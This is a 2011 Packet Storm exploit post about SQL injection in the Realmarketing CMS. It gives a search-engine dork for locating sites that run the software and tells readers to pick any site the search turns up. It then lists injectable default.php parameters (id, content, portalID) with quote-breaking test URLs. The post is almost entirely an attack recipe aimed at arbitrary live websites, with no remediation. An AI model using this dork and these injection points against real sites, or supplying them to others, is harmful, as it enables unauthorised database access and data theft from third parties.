Realmarketing CMS SQL Injection

2011-04-22T00:00:00
ID PACKETSTORM:100716
Type packetstorm
Reporter Xecuti0N3r
Modified 2011-04-22T00:00:00

Description

                                        
                                            `#(+)Exploit Title: Realmarketing CMS System Sensitive Database Disclosure Vulnerability  
#(+)Author : ^Xecuti0n3r  
#(+) Date : 22.04.2011  
#(+) Hour : 13:37 PM  
#(+) E-mail : xecuti0n3r()yahoo.com  
#(+) dork : intext:realweb.de inurl:default.php  
#(+) Category : Web Apps [SQli]  
  
____________________________________________________________________  
____________________________________________________________________  
  
Choose any site that comes up when you enter the dork intext:"intext:realweb.de inurl:default.php" in search engine  
  
  
*SQL injection Vulnerability*  
  
# [+]http://site.com/default.php?id='125  
# [+]http://site.com/default.php?id=[SQLI]  
# [+]http://site.com/default.php?content='2485  
# [+]http://site.com/default.php?content=[SQLI]  
# [+]http://site.com/default.php?portalID='68  
# [+]http://site.com/default.php?portalID=[SQLI]  
# [+]http://site.com/default.php?&id='121  
# [+]http://site.com/default.php?&id=[SQLI]   
____________________________________________________________________  
____________________________________________________________________  
  
########################################################################  
(+)Exploit Coded by: ^Xecuti0n3r  
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r  
########################################################################  
`